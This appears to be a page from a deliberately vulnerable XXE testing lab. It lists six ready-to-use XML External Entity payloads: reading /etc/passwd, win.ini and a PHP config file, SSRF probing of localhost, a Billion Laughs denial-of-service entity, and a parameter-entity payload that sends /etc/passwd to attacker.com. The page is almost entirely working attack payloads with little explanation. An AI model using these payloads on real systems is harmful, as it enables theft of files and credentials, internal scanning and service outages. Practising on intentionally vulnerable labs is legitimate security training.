📄 XXE (XML External Entity) Testing

← Back to Home

XML Parser (XXE Vulnerable)

Basic XXE Payloads: 1. File Disclosure (Windows): <?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini"> ]> <root>&xxe;</root> 2. File Disclosure (Linux): <?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <root>&xxe;</root> 3. Internal Network Scanning (SSRF via XXE): <?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "http://localhost:80"> ]> <root>&xxe;</root> 4. PHP File Disclosure: <?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=config.php"> ]> <root>&xxe;</root> 5. Billion Laughs Attack (DoS): <?xml version="1.0"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> ]> <lolz>&lol3;</lolz> 6. Parameter Entity: <?xml version="1.0"?> <!DOCTYPE root [ <!ENTITY % file SYSTEM "file:///etc/passwd"> <!ENTITY % eval "<!ENTITY &# x25; exfiltrate SYSTEM 'http://attacker.com/?x=%file;'>"> %eval; %exfiltrate; ]> <root></root>